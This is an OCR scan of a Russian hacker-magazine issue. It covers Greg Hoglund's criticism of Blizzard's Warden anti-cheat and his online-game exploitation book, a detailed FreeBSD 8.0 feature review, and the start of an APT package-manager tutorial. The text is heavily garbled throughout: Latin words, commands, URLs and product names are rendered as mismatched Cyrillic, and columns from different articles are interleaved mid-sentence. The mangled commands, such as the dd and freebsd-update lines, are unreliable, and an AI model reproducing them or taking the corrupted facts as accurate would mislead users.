Но на деле ѴѴагбеп собирает очень много част- 
ной информации, например, сканируетсписок 
всех за пуще иных на твоей машине процессов, 
сравнивая их с сигнатурами процессов пи- 
терских. И впоследствии эта инфа может быть 
использована по-разному, втом числе, ВІіггагсІ 
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СЦЕНА 



‘Очень трудно защитить себя без кеннк либо сведений о возможностях к действиях 
противника* 8 этой книге подробно рассмотрены вопросы о тоы, нам хакеры 
ни ходя г пресчеты в системе безопасности н как они их ис пользу ют, Подробная 
информация поможет вам сохранить в безопасности собственные снсюмы~ 

— ЭдФэлтон, доктор философии, профессор кофодры 
информатики Принстонского ункоорс итога 
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ОБЛОЖКА РУССКОГО ИЗДАНИЯ ПЕРВОЙ КНИГИ ХОГЛАНДА — «ЕХРЮІТІЫС 
50РТѴѴАКЕ» 



ОБЛОЖКА <<К00ТКІТ5 Р 51ІВѴЕКТІМСТНЕѴѴІМ00ѴѴ5КЕКНЕІ_» 



В целом, очень интересное чтиво 
о поискахуязвимостей и возмож- 
ностях взлома различных ммо. 
Конечно, одним только ѴѴогШ оГ 



ничая, остаться необнаруженным. 
Текст изобилует актуальным кодом 
и множеством идей, плюс, авторы 
оченьсерьезно подошли квопросу 
права и вопросу зарабатывания 



вполне могут ею «злоупотребить». благо, мониторит адреса людей, с ѴѴагсгаК дело не ограничилось, 

Помимо этого Хогланд пришел и к которыми ты общаешься, следит за например, Хогланду по душе еще и денег на продаже виртуальных 



ХОГЛАНД ДОВОЛЬНО ДОЛГО БИЛСЯ НАД 
РЕАЛИЗАЦИЕЙ ТЕХНИКИ ОБХОДА СИСТЕМНЫХ 
МЕХАНИЗМОВ ЗАЩИТЫ ШВОѴѴЗ. 



другому, не менее забавному, вы- 
воду — ѴѴагбеп оказался довольно- 
таки туп. Например, если написать 
простенькое приложение-кальку- 
лятор, назвать его «ѴѴоѴѴ! I птаѣе» 
(название одного известного 
питерского мода], и за пустить этот 
калькулятор одновременно с ѴѴогШ 
оШагсгаіфто... вуаля, ты будешь 
забанен, какзлостный читер! 
Словом, Хогланд назвал по- 
ведение модуля похожим на 
полиморфный вирус, обратился 
в правозащитную организацию 
Еіесіхопіс Ргопбег Роипбабоп и дал 
немало интервью и комментариев 
на эту тему. В общем-то, действи- 
тельно не слишком приятно, когда 
софт, пусть даже работающий во 



тем, какие сайты ты посещаешь и 
какие программы используешь... 
В ВІІ 22 агсІ, впрочем, отреагиро- 
вали довольно меланхолично, 
заявив, что ничего незаконного 
ѴѴагбеп не делает, а о возможной 
слежке за пользователем, факти- 
чески, черным по белому сказано 
в пользовательском соглашении. 
Хогланд, однако, так просто от 
проблемы не отступился. Посвя- 
тивтеме безопасности онлайно- 
вых игр добрых несколько лет, он 
в соавторстве с Гари МакГроу на- 
писал и выпустил книгу«Взлом 
онлайновых игр» (Ехріоіііпд 
О п Іі пе (За тез], очень много вни- 
мания и места в которой уделено 
именно ѴѴоѴѴ. 



такие проекты, какАзбегоп’з СаР II, 
ЕѴЕ Опііпе и Ѵапдиагб. 

Из книжки можно почерпнуть 
немало нового о самых разныхтех- 
никах читерства и о том, как, жуль- 



предметов. Читерство в игреуго- 
ловно наказуемым деянием пока 
не является :]. 

Стоит отметить, что Хогланд и 
МакГроу осветили этот вопрос 
одними из первых — книга вышла 
в свет в 2007 году, а индустрия 
онлайновых игр пока очень 
молода, и нетак много экспертов 
по совместительству являются лю- 
бителями поиграть. Ксожалению, 
Ехріоіііпд Опііпе Оатез на русский 
язык пока не переводилась, ц-ц 




Зивѵертмо тне ѴѴімооѵѵз Кегрячеі- ▼▼ 
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Детальный обзор РгееВЗО 8.0 



Неуспели мы нарадоваться выпуску семерки, как разработчики 
РгееВЗО уже готовы обрадовать нас восьмой версией своей ОС, которая 
хоть и не несет в себе глобальных изменений, но вполне способна 
порадовать поклонников множеством исправлений и доработок, которых 
ждали втечение многихлет. 



Релиз8.0 нетакбогатна нововведения, как 
его предшественники, что совсем неумень- 
шаетегозначимость. Именно в восьмерке 
исправлены те проблемы, за которые РгееВЗО 
причисляли канахроничным, отстающим ОС. 
Теперь РгееВЗО неуходит в панику во время 
извлечения ОЗВ-флешки, обладает сущест- 
венно переработанной и улучшенной системой 
«песочниц» раіІ5ѵ2], работает в качестве гостя 
вХеп-окружениях последних версий, обладает 
переработанным высокопроизводительным 
ЗМР-планировщиком задач, поддерживает 
ЫР5ѵ4, может загружаться с ОРТ-разделов, 
поддерживаеттехнологию защиты отсрыва 
стека РгоРоІісе, позволяет использовать 
локаль ІІТР-8 в консоли, может выступать хост- 
системой для ѴіігиаІВох 3.x и многое, многое 
другое. Но обо всем по порядку. 



ЯДРО 

Одна из целей выпуска 8.0 состояла в том, 
чтобы позволить РгееВЗО работать внутри 
инфраструктуры облачных вычислений Атагоп 
ЕС2. Для этого в дерево исходныхтекстов 
была добавлена поддержка ВМ Хеп последних 
версий, которая позволяет32-битной редакции 
РгееВЗО работать внутри Хеп-окружения 
(сіот И) . Поддержка ботО, позволяющая ОС 
быть хостом для других ОС, к сожалению, пока 
не реализована. 

ОЗВ-стекбыл полностью переработан и избав- 
лен от многих проблем. Теперьэто полностью 
масштабируемый на все ядра процессора код, 
лишенный глобальных блокировок (хотя неко- 
торые драйвера еще не переписаны]. Добавлен 
уровеньсовместимости с ОЗВ-подсистемой 
І_іпих. Реализована полная поддержка разде- 



ленных (ЗрШ:) и Н5 ІЗОСтранзакций, благодаря 
чему появилась возможность использования 
скоростных аудиоустройств с интерфейсом 
115В на современных ІІЗВ-хабах и возможность 
создания драйверов для высокоскоростных 
\л/еЬ-камер. Теперь полностью поддержи- 
вается 05В на встраиваемыхустройствах, 
реализована поддержка режима 05В дабдеО 
улучшен алгоритм сброса содержимого кэшей и 
буферов, появился механизм автоопределения 
загрузочных ОЗВ-дисков. Добавлена утилита 
изЬсопТд. 

Решена одна из самых серьезных проблем 
РгееВЗО на настольных машинах: некоррект- 
ная обработка факта извлечения ОЗВ-накопи- 
теля без размонтирования файловой системы 
(что зачастую приводило кпанике ядра). Тыся- 
чи пользователей отправили баг-репорты об 
этой проблеме, тысячи троллей сочинили сотни 
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ЕгесВЗВ 0.0-НС2 СЙЕМЕЙІСЗ НО ■ 5ит Осі 25 07:27:15 ЫТС 2005 
Ыеісогпе Іо ГгееВЗП! 

ВеГоге кеекіпу іесЪпіса! зиррогі, ріеазе изе іЬе ГоІІоыіпд гезоигсез : 

о Зесигііу айѵізогіез аш) ирйаіеД еггаіа іпГогтаііоп Гог а] I геіеазез аге 
аі Ъіір : //ыыы , ГгееВЗІ* , огд^ге ( еазез^ - аіыауз сопки Іі іііе ЕЕВАТА кесііош 
Гог уоиг геіеазе Гігзі аз іі'з ир<1аіе<1 Ггедиепііу. 

о ТИе НапйЪоск аіиі ЕАЕ] гісситепіз аге аі Іііір : /ууьду , ЕгееВЗВ ,огд/ ап В , 
аіопд уііН іііе шаіііпд іібік, саг Ъе зеагсЬей Ьу дпіпд іо 
Іііір : //иии „ ЕгееБЗВ - огд^зеагсЬ/ . [Г іЪе Дос Дізіг іЬиііоп как 
Ьееп іпніа 1 Іе<і , іііеу'ге аіко йѵдіІаЫе ГогшаііеД іп ^изг/'зіааге^гіос .. 

ІГ уои нііМ каие а щлезііоп аг ргоіігт, ріеазе іакс іііе сшіриі оГ 
Чтите -а' > а Іону ыіік апу гсіеѵипі еггог тек^ауек , апгё етиіі іі 
аз а диезіійіі іо іііе диекі і ппзРЕгееВЗВ , огу та і Мид Ііні. [Г уои аге 
ипГйтІІіАГ иііік ГгееЕЗВ'з Лігесіогу Іаупиі, ріеазе геГег іо іііе ЬіегС71 
та тіа 1 раде. [Г уои аге поі ГатПіаг иііік та пи а I ридеа, іуре 'мал тал'. 

7ои тау аізо изе зузІпзіаІПвІ іо ге-еліег іііе іпзіаііаѣіоп агй 

сопГ ідигаііоп иіііііу. Е<Пі /еіс/гпоігі іо скапде іЬІз Іоуіп аппоипсетепі . 



Приветствие ГгееВЗР 8.0 



анекдотов, десятки хакеров предлагали свои 
багфиксы, но дело не сдвигалось с мертвой 
точки. Корни бага скрывались глубоко внутри 
подсистемы ѴР5, которая требовала глобаль- 
ной переработки и глубокого переосмысления. 
В конце концов, РгееВЭЭ Роипбабоп просто 
купила разработчика по имени Ебѵѵагб Тотазг 
Ыаріегаіа, который сделал всю грязную работу 
и заставил ядро реагировать правильно. 
Подсистема «тюрем» Раііз), позволяющая за- 
пирать процессы в изолированные песочни- 
цы, была существенно переработана. Теперь 
тюрьма может иметь сразу несколько ІР-адре- 
сов (или не иметь их вообще], поддерживает 
протоколы ІРѵб и 5СТР, может быть «вло- 
женной» в другую тюрьму (можно создавать 
иерархическую систему безопасности], а также 
привязанной к конкретному процессору/ядру. 
Добавлена новая команда ядерного отладчика 
ООВ «зЬоѵѵ ]аіІз». 

Во РгееВЭЭ 8.0 включена новая версия опти- 
мизированного для 5МР-систем планиров- 
щика процессов Ш_Е 3.0. Улучшен алгоритм 
распределения процессов и потоков по 
процессорам, повышена производительность, 
появилась возможность привязки Оаіі-окру- 
жений к конкретным ядрам процессора. 

Теперь РгееВЭЭ поддерживает та к называ- 
емые супер-страницы памяти (зиреградез], 
благодаря чему производительность многих 
приложений может быть существенно повы- 
шена (до 30%]. Супер-страницы поддержи- 
ваются почти всеми современными процес- 
сорами семейства х86 и позволяют буферу 
ассоциативной трансляции (Тгапзіабоп 
Іооказісіе ЬіТІег, ТІ_В] ссылаться на очень 
большие страницы физической памяти (4 Мб]. 
Какследствие, зона охвата ТІ_В существенно 



увеличивается, а рискпромаховуменьшается. 
Лимит памяти ядра, составляющий 2 Гб, был 
увеличен до 512 Гб для архитектуры АМ064. 
Благодаря этому файловая 2Р5 теперь не 
засыпает пользователей сообщениями о 
нехватке памяти и показывает более высокие 
характеристики производительности. 

«Вес» нитей ядра был значительно снижен. 
Нити, используемые, например, для обработки 
исключений или обслуживания устройств, 
обладают гораздо меньшим количеством 
выделенных ресурсов, и ядро потребляет 
меньше памяти. 

С выходом 8.0 файловая система ргосЫ4) 
(обычно монтируемая к каталогу/ргос] объяв- 
ляется устаревшей. Вместо нее рекомендуется 
использовать новую утилиту ргосзІаШ ] и 
библиотеку ІіЬргосзГаГО], которые позволяют 
получитьо процессахтакие сведения, как: 
аргументы командной строки, информацию о 
файловых дескрипторах, нитях, стеке, занима- 
емой виртуальной памяти и многом другом. 
Новая версия ОС получила механизм исследо- 
вания последствий сбоя ядра под названием 
ТехЮитрз. После «ухода ядра в панику» 
происходит не только запись полного дампа 
памяти ядра на диск, но и автоматическое 
извлечение из него наиболее важной инфор- 
мации, ееупаковка віаг-архив иудаление 
оригинального дампа. Механизм позволяет 
существенно снизить расходы дисковой 
памяти, используемой для хранения дампов, 
и повышаетскорость разработки и отладки 
ядра. 

Система отладки и трассировки ОТгасе нако- 
нец окончательно интегрирована во РгееВЭЭ. 
Шгасе была разработана 5ип Місгозузіетз 
для ОС Эоіагіз и предоставляет в распоряже- 



НЕ ТОЛЬКО НА СО 



В дополнение кустановочным СЭ и ЭѴВ, РгееВ5О8.0 распространяется и в виде установочно- 
го образа для 1)5В-флешек, для копирования которого достаточно выполнить такую команду: 

# (М іб = 8 . 0-атО64-тетзЦіск . ітд оР = /с1еѵ/с1аО Ьз = 10240 сопѵ=зупс 



ние разработчиков мощнейший инструмент 
трассировки ядра и процессов, включающий в 
себя специальный язык. Пока для РгееВЭО ре- 
ализована только возможность отладки ядра, 
в то время как реализация функции отладки 
процессов отложена на некоторое время. 

Слой эмуляции текстовыхтерминалов (ТТУ 
Іауег], используемый для прямой коммуника- 
ции пользователя с ОС (эмуляциятерминала, 
в котором запускается командный интер- 
претатор), был переработан: код избавлен от 
глобальных блокировок, увеличена произ- 
водительность, произведена оптимизация, 
переработан механизм буферизации. Это один 
из самых древних компонентов ядра РгееВЭЭ 
(20-25 лет!], ккоторому не притрагивались в 
течение долгого времени. 

Драйвер консоли зу5сопз(4], отвечающий 
за работу с видеоадаптером и клавиатурой и 
предоставляющий пользователю виртуальный 
терминал, был улучшен и теперь полностью 
поддерживает ІІТР-8. Это значит, что РгееВЭО 
8.0 «говорит на юникоде» нетолько в иксах, но 
и в «голой» консоли. Код основан на библио- 
теке Іі Ьіекеп , реализующей эмуляцию ѵИ 00/ 
хІегт/ІІТР-8 для виртуальных терм и налов, 
работающих через драйвер консоли зузсопз. 

СЕТЕВОЙ СТЕК 

В сетевой стек был добавлен код виртуали- 
зации. Теперь ядро способно поддерживать 
сразу несколько состояний сетевого стека 
одновременно, благодаря чему «тюрьмы» 

[\а\[) могут быть абсолютно независимы друг от 
друга в сетевом плане, включая обособленные 
брандмауэры, виртуальные сетевые интерфей- 
сы, лимиты пропускной способности, таблицы 
маршрутизации и конфигурации ІРзес. Пока 
это экспериментальные и не рекомендованные 
к применению возможности, которые получат 
статус стабильных в следующих релизах. 

В дополнение к виртуализации сетевого стека 
восьмерка получила поддержку м ноже ст- 
венныхтаблиц маршрутизации (Рогѵѵагбіпд 
Могппабоп Вазез, РІВз], которые позволяют 
организовать так называемый «роіісу Ьазеб 
гоибпд», когда путем определения правил к 
пакету может быть применена альтернатив- 
ная таблица маршрутизации. Это может быть 
использовано, например, в ^(.-окружениях. 
Во РгееВЭЭ 8.0 добавлена поддержка беспро- 
водных тезб-сетей, описанных в стандарте 
802.1 1 з. В отличие от обычной сетевой тополо- 
гии, предполагающей наличие центральной 
точки доступа (Ассезз Роіпі, АР], тезЬ-сети 
выглядят какаб-Ьос сети (децентрализован- 
ные беспроводные сети, не имеющие постоян- 
ной структуры] без центрального узла, который 
можетупасть и нарушить связь всехузлов. 

Код механизма ВРР (Вегкеіеу Раскеі РіКег], 
используемого для захвата и вставки пакетов 
из/в сетевого стека, был изменен и теперь 
производит меньшее количество операций 
копирования памяти между ядром и прило- 
жением, что в некоторых случаях повышает 
производительность. 
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Рабочий стол 



ПРОПОЛИС ДЛЯ ПРЕДОТВРАЩЕНИЯ АТАК СРЫВА СТЕКА 



РгоРоІісе — патч для ОСС, с помощью которого переопределяются объявления локальных 
переменных и добавляются дополнительные проверки во время выполнения программ. 
При обнаружении переполнения проблемный процесс ликвидируется и в системный 
журнал производится записьтипа «зіаскоѵегібоѵѵіп ^ипсІіопХХХ». Веб-страничка проекта: 
ѵѵѵѵѵѵтезеагсЬбЬтщот/М/ргоіесіз/зесигііу/ззр . 



Код реализации протокола ЫЕ5 наконец-то 
обрел поддержку четвертой версии, которая 
имеет повышенную производительность и 
гораздо более высокий уровень безопасности 
(АСИ, механизм аутентификации, использую- 
щий КегЬегоз]. Также были обновлены клиенты 
и серверы протоколов ЫЕ5ѵ2/3. 

ПОДСИСТЕМА 
ХРАНЕНИЯ ДАННЫХ 

ЕгееВЭО 8.0 получила новый АНСІ-драйвер, 
реализованный как часть подсистемы САМ 
(Соттоп Ассезз МеТИосІ). Драйвер поддержи- 
вает несколько новых возможностей (таких, 
как N00], и может быть сконфигурирован с 
помощью утилиты сатсопігоі. В будущем 
САМ планируется превратить в стандартный 
фреймворкдля всевозможных протоколов и 
транспортов, используемых для доступа к 
устройствам хранения данных. 

Менеджер логическихтомов дѵіпит, со- 
зданный ка к за мена ѵі пит в новых версиях 
ЕгееВЭО, был обновлен до версии 2 и обрел 
статус стабильного и полностью готового к 
использованию решения. Исправлены многие 
проблемы, добавлена новая функциональ- 
ность, сохранена совместимость с дѵіпит 1 
и ѵі пит. Сѵі пит менее гибок, чем решения 
на базе набора стандартных СЕОМ-классов 
(дтіггог и дзіхіре], но придется по вкусу ветера- 
нам и любителям решений все-в-одном (под- 
держивается 3 ВО О, РАЮ О, РАЮ 1 апб РАЮ 5]. 
ВЕОМ-класс ВЕ0М_РАРТ (драг!) теперь 



используется по умолчанию для работы с раз- 
личными схемами разметки диска (МВР, 6РТ, 
В50 и т.д.) Это решает некоторые проблемы за- 
грузки ЕгееВЭЭ и делаетдисковую подсистему 
более гибкой (например, поддерживается до 26 
ВЭй-разделов в рамках одного слайса]. Кроме 
того, восьмерка без проблем загружается с 
ОРТ-разделов (новая схема разметки диска, 
которая должна прийти на сменутеперешней]. 

ПЕСТРАЯ ЛЕНТА 

Мир, ядро и ПО из портов теперь собираются 
с помощью 6СС с активированной системой за- 
щиты от срыва стека (Эіаск-ЭтазЫпд РгоТесТог, 
в прошлом РгоРоІісе]. Система способна об- 
наружить большинство ошибокперепол нения 
буфера с помощью проверки стека вызовов на 
изменение. Если изменение имело место быть, 
приложение убивает само себя. 




Представительство РгееВБР в 
Сети 



Система управления деревом портов была 
модифицирована итеперь поддерживает па- 
раллельную сборку приложений, что позволяет 
задействовать все имеющиеся ядра процес- 
сора. 

ЕгееВЭО теперь полностью поддерживает все 
модели субноутбуков А51І5 ЕееРС. Работают 
беспроводные карты, НідЬ Оебпіііоп Аибіо 
(зпб_Ьба), тачпад, полностью реализован ре- 
жим засыпания, контроль за температурой. 
Восьмерка включает код переработанного 
звукового драйвера Н ЮА (НідЬ ОеОпіОоп Аибіо), 
который более полно соответствует специ- 
фикациям ИАА (Опіѵегзаі Аибіо АгсЬкесЮге], 
включает более широкий спектр кодеков, 
работает в многоканальном режиме, обладает 
расширенными возможностями конфигуриро- 
вания и полностью поддерживает временное 
засыпание системы (зизрепб/гезите). 

Среди более мелких изменений можно отме- 
тить: 

• ПО виртуализации ѴігШаІВохЗ.Х было полно- 
стью портировано на ЕгееВЭО. 

• Реализована поддержка В0МА(Вето1:е 
ОМА]. 

• Возможность привязки обработчиков ІВО и 
потоков куказанным процессорам/ядрам. 

• Количество групп, к которым может прина- 
длежать пользователь (ЫСР01ІР5], увеличено 
до 1024. 

• ОрепВЭМ был обновлен до версии 1.1. 

• Утилита такеіъ была портирована из ЫеЮЭО. 

• Реализована поддержка сегментов 5У5Ѵ5НМ 
больше, чем 2 Гб на АМ064. 

• Новая, более «чистая», реализация протоко- 
ла АРР. 

• Обновление кода маршрутизации для лучшей 
поддержки 5МР-систем. 
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Так работает виртуализация сетевого стека 



• Поддержка режима виртуальных точек доступ а (ѴАР, 
«ѵіііиаІѴѴіРі») в беспроводных сетях. 

• Многочисленныеулучшения производительности на 
ЭМР-системах. 

• Поддержка платформы Іпіеі ЫеЬаІет/ Соге І7. 

• Обновление кода поддержки АСРІ. 

• Утилита ісрсі и тр обновлена до версии 4.0. 

2Р513 

КодЕРЭ был доработан, избавлен отмногих проблем и 
обновлен до версии 13. Этот шаг позволил снять с 2РЭ статус 
экспериментальной разработки и внес множество измене- 
ний, среди которых: 

• Поддержка загрузки с 4РЭ. 

• Частичная поддержка сМІадзй. 

• Начальная поддержка АСИ формата ЫРЭѵ4. 

• Поддержка расширенных атрибутов. 

• Поддержка Эрагзе ѵоіитез.то есть массивов 2Ѵ0І_, кото- 
рые не резервируют место в пуле. 

• Рядовые пользователи теперь могут получить права на 
создание ФС, снапшотов ит.д. 

• С помощью переменной ѵ^5.2^5.зирег_о\л/пег можно 
регулировать, сможетли рядовой пользователь выполнять 
привилегированные операции над файлами ФС. 

• Возможность использования дополнительных дисков для 
кэширования. Поднимает производительность на операци- 
ях чтения. 

• Возможность использования дополнительных дисков для 
Іпіепі Иод 2РЭ, чтобы ускоритьоперациитипа б5упс(2) . 

• Может быть выбран один из режимов отказа, действующий 
при выходе дисков из строя: рапіс — паника ядра при ошиб- 
ке записи, ѵѵаіі — ожидание появления диска, сопбпие — 
обработка запросов чтения и отказ в запросахзаписи. 

• Новые свойства: гекщоіа, геітезегѵабоп. Аналоги циоіа 

и гезегѵабоп без учета места, занимаемого дочерними ФС, 
клонами и снапшотами. 



КАК ОБНОВИТЬСЯ ДО РКЕЕВЗО 8. 


■ 


# РгееЪзб-ирбабе ирдгасіе -г 8.0- 
// обновление ядра 

# РгееЪзб-ирбабе іпзбаіі 

# зЬибсІомп -г пом 

// обновление «мира» 

# бгееЬзб-ирбабе іпзбаіі 


КЕЬЕАЗЕ 


// удаление оставшихся компонентов 

# РгееЬзб-ирбабе іпзбаіі 

# зішбсіомп -г пом 



* Щіпдіе' зпс! "сІоиЫе" диоіев 

♦ Сигі у ароБІгорГіез : "Не'ѵе Ьееп Гіеге 

• Ьаѣіп-1 аровігорГіе апсі ассепіз: 

* ЩеиіівсЬе' „ЙггГйЬгипдзгеісЬегГ 

♦ Т , *, 1, *, 3-4 , ~5/+5, ... 

• ЙЗСІІ ваГеііу Іеві: 1111, 000, ЗВ 

О П 

♦ ІГіе еиго вутЬоІ : | 14.95 € | 

0 □ 



ЦТР-8 во всей красе 



ПЛАНЫ НА БУДУЩЕЕ 

Не все планируемые нововведения попали в релиз РгееВЭЭ 
8.0, за бортом остались два интереснейших проекта, кото- 
рые почти готовы, но не могут быть интегрированы в код 
из-за некоторых проблем. 

Первый из них нацелен на получение возможности сборки 
ядра с поддержкой стека протоколов ІРѵб, но без поддержки 
ІРѵ4. Это позволит заранее подготовить РгееВЭО к полному 
переходу на новый стек протоколов, сделать сетевой код 
ОС более чистым и модульным, а также получить произво- 
дительное и компактное ІРѵб-ядро. Ксожалению, огром- 
ный объем работ не позволил завершить проект к выходу 
восьмерки. 

Второй, гораздо более приоритетный, проект ставитсвоей 
целью отказаться от использования компилятора ССС 
для сборки компонентов РгееВЭО и портов. Эта идея уже 
многие годы занимала умы разработчиков всех веток ВЭЭ, 
а после перехода ССС на использование СРІ_ѵЗ проблема 
стала еще более острой (многие компании, применяющие 
РгееВЭО, не могут использовать ПО, опубликованное под 
лицензией СРІ_ѵЗ]. Как результат, родился проект по пере- 
воду РгееВЭО на связку І_І_ѴМ + СІ_АЫ6, распространяемых 
под лицензией ВЭО. В качестве побочного эффекта этот 
шаг дает прирост производительности (І_І_ѴМ существен- 
но лучше оптимизирует код]. К моменту выхода 8.0 ядро 
и большинство компонентов базовой системы уже могли 
быть собраны с помощью нового компилятора, однако 
множество незакрытых проблем не позволили проекту 
попасть в новый релиз. 

ПОСТСКРИПТУМ 

В каком-то смысле РгееВЭО 8.0 подводит итог всему, 
что было сделано после выхода пятерки. Ядро стало 
по-настоящему масштабируемым, 2РЭ обрела статус 
стабильной, ЫРЭ- клиент и сервер теперь поддержи- 
вают четвертую версию протокола; были исправлены 
наболевшие ошибки и многие проблемы прошлых 
версий; поддержка оборудования расширилась до 
более чем приемлемого уровня. Если ты никогда 
не пробовал РгееВЭО, сейчаслучшее время, чтобы 
сделать это. ц-Ц 




> іпіо 

Некоторые из 



описанных нововве- 
дений уже были пор- 
тированы в РгееВЭО 
7, поэтому необходи- 
мости в переходе на 
восьмерку может и не 
возникнуть. 




> ѵѵагпіпд 

ОЕОМ_РАРТ интер- 
претирует та блицы 
разделов нетак, как 
его предшественни- 
ки, поэтому будь осто- 
рожен при обновле- 
нии: имена разделов 
могут измениться. 
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Я^тіткшиРкштътікв 

ЮѴАН УСьВ РАСКА 6Ш6 Т001. АОѴАИСЕО РАСК/ 
КА6Ш6 ТООІ. АОѴАИСЕО РАСКА6Ш6 ТООІ. АО 
АОѴАІІСЕО РАСКА6Ш6 Т00І.А0ѴАМСЕ0 РАСК/ 



АРТ и все, все, все 

Изучаем возможности менеджера пакетов 
АРТ и сопутствующих программ 

ОеЬіап внес в мир Ыпих массу положительных нововведений, многие из 
которых были приняты и другими дистрибутивами. Самым значительным 
усовершенствованием йеЬіап стала система управления пакетами АРТ. 
После ее выпуска все остальные дистрибутивы превратились в устарев- 
ший хлам. Сегодня АРТ сложна, умна, гибка и скрывает от непосвящен- 
ного линуксоида множество секретов. 



ПРОДВИНУТАЯ СИСТЕМА 
УПРАВЛЕНИЯ ПАКЕТАМИ 

Сама по себе АРТ (АбѵапсесІ Раскадіпд ТооІ) 
не является системой управления пакетами 
в прямом смысле этого слова. Все действия 
по распаковке, регистрации в системе и 
ведению базы пакетов выполняютутилиты 
пакета бркд, в то время какутилиты АРТ 
представляют собой обертку, с помощью ко- 
торой осуществляется поиск пакетов, сверка 
контрольных сумм, выкачивание из репози- 
тория, раз решение зависимостей, а также 
ряд других действий. АРТ включает в себя 
следующий набор утилит: 

УТИЛИТЫ ПАКЕТА АРТ 

арр-саске — манипулирует кэшем до- 
ступных пакетов, обычно использует- 
ся для поиска пакета и/или получения 
информации о нем 

арр-сбгот — позволяет добавить СБ/ 
БѴБ-диск в качестве источника паке- 
тов (репозитория) 

арР-сопРід — читает значения опций, 
заданных в конфигурационном файле / 
еРс/арР/арР . сопР , используется дру- 
гими АРТ -утилитами 
арР-ехРгасРРетрІаРез — извлекает 
конфигурационные файлы БеЪСопР из 
пакетов, используется другими АРТ- 
утилитами 



арР-РРрагскіѵе — создает индексные 
файлы 

арб-деб — устанавливает, удаляет, 
обновляет список пакетов и сами па- 
кеты, центральная АРТ-утилита 
арр-кеу — управляет ключами аутенти- 
фикации, используемыми для проверки 
подлинности источников пакетов 
арр-зесиге — проверяет подлинности 
цифровой подписи пакетов арр , входя- 
щих в состав дистрибутива и репози- 
ториев 

арр-зогрркдз — сортирует индексные 
файлы 

Утилиты опираются на следующие файлы 
конфигурации: 

КОНФИГУРАЦИОННЫЕ ФАЙЛЫ АРТ 

/еРс/арР/зоигсез . ІізР — список ис- 
точников пакетов (репозиториев) 
/еРс/арР/арР . сопР — основной файл 
конфигурации АРТ 

/еРс/арР/ргеРегепсез — файл предпоч- 
тений, управляет тем, какая версия 
пакета будет установлена в случае 
наличия в репозитории сразу несколь- 
ких версий 

АРТ проста и понятна в использовании. 
Среднестатистическому пользователю обычно 



достаточно всего шести нижеприведенных 
команд: 

ОСНОВНЫЕ КОМАНДЫ АРТ 

арр-саске зеагск маска — поиск па- 
кета 

арр-саске зкочл пакет — просмотр ин- 
формации о пакете 

арР-деР іпзРаІІ пакет — установка 
пакета 

арР-деР гетоѵе пакет — удаление па- 
кета 

арР-деР ирбаРе — обновление кэша до- 
ступных пакетов 

арР-деР ирдгабе — обновление всех 
пакетов 

Последние две команды обычно выполняются 
одна за другой, в результате чего переустанав- 
ливаются все пакеты, для которых в репозито- 
рии доступны новые версии. Если же необходи- 
мо обновить только указанный пакет, то после 
«а рР-деР и рсІаРе» следует выполнить команду 
«а рР-деР іпзіаіі пакет». 

Дистрибутив ІЛэипШ сводит процесс«обще- 
ния»с АРТ-утилитами ккликанью по галоч- 
кам графического интерфейса. В нем есть 
собственный, предельно простой менеджер 
пакетов (таки называется — Раскаде Мападег], 
запускающийся по сгоп’у менеджер обновле- 
ний Іірсіаію Мападег, графический установщик 



► 076 



ХАКЕР 01 /133/ 10 




тшо РАСКА6М6 ТООЬ АОѴАЫСЕО РАСКА 
А6ІЫ6 Т001. АОѴАМСЕО РАСКА6Ш6 Т001. Ш 



Ас1іоіі5 11п(!о Раскаде Кезоіѵег БеагсЬ Орііопз Ѵіемн НеЪр 
С-Т: Мели 7: Неір д: Оуіі и: Іірсіаіе д : Ооипіоай/Хпзіаіі/Кетоѵе Ркд 5 
аріііисіе Ѳ. 4 Л 1.11 


-А Іпзіаііегі Раекадез (1364) 

— айтіп - Айтіпізігаіііѵе иііііііез (іпзіаіі зоііиаге, 


тападе изегз, еіс) (117) 


- -\ Ьазе - Тбе ІіЬипіи Ьазе зузіет (2) 

- \ таіп - Риііу гиррогіеб Ргее БоІІѵ^аге. (1) 




Іі п их - ітаде - 2 ,6,28-14- де п е гіс 


2,6,28-14. 2,6.28-14. 



ОѴАМСЕО РАСКА 
О РАСКА6Ш6 ТО 



— геэігісіес* - Віпагу-опіу йеѵісе гігіѵег&, (1) 

— йеѵеі - ідіііііез апгі ргодгата 'Гог зоТікаге сіеѵеіортепі (39) 

— гіос - ОосшпепіаХіоп апсі 5ресіаІі2есі ргодгагп$ “Гог ѵіеиіпд гіосшпепіаііоп (14) 

— есіі^ог^ - Техт егіііогз апй иогсі ргоее550г5 [7} 

— датез - Сатез, Хоуз, апй Ііт ргодгатз (12) 

— дпоте - ТРе ОМОМЕ Оезкіор ЙузХет (82) 

— дга рЬісз - ШіііХіе з Іо сгеа іе, ѵіеи , агні егііХ дгарЬісз ^ііез (12) 

І_іпих кегпеі ітаде Хог ѵегзіоп 2. €.28 оп х8б/х8б_64 

Тбіз раскаде сопіаіпз Хбе І_іпих кегпеі ітаде Іог ѵеггіоп 2.6.28 оп х8Б/х8б 64, # 



АІ &0 іпсіисіез ФЬе соггезропйііпд Зуаіет.тар іііе, ібе пюсіиіез Ьиііі Ьу Ібе 
раекадег, апй зсгіріз Ікаі ігу Іо еп$иге ібе $у$1ет І5 поі ІеІІ іп ап 

ипЬооіаЫе зіаіе а^ііег ап ирраіе . 

к 

Зиррогіз Сепегіс ргоееззогз. 



Сеагегі іошггі сіезкіор зузіетз. 



Ѵои Іікеіу гіо поі иап! іо іпзіаіі ііііз раскаде йігесііу. ІпзіеасІ, іпзіаіі Іііе 

г^Кп Г’ к п 



$ зисіо арС-кеу асіѵ --кеузегѵег 
сервер- сертификации --гесѵ-кеуз 



Аріііисіе имеет действительно удобный интерфейс 



вручную загруженных сІеЬ-пакетов СОеЬі и 
более мощная графическая надстройка над 
АРТ-утилитами Зупарбс. 

Междутем, АРТ гораздо сложнее и гибче, 
чем это может показаться на первый взгляд. 
Поэтому в следующих разделах мы рассмот- 
рим несколько не совсем типичных приемов ее 
использования. 

СТОРОННИЕ ИСТОЧНИКИ 
ПАКЕТОВ 

Помимо головного репозитория, содержащего 
все пакеты от разработчиков дистрибутива, 
существует и масса других источников паке- 
тов, которые могут содержать стороннее ПО, 
недоступное из официального репозитория, 
предоставлять более свежие его версии или 
просто быть более быстрым зеркалом. Репо- 
зиторием может быть и обычный каталог на 
твоем жестком диске и компакт-диск. 

Чтобы научить АРТ работать со сторонними 
репозиториями, достаточно выполнить четыре 
простых действия: 

1. Добавить ссылку на репозиторий в файл / 
еіс/арі/зоигсез.іізі: в следующем формате: 

сІеЪ игі дистрибутив [компоненті] 
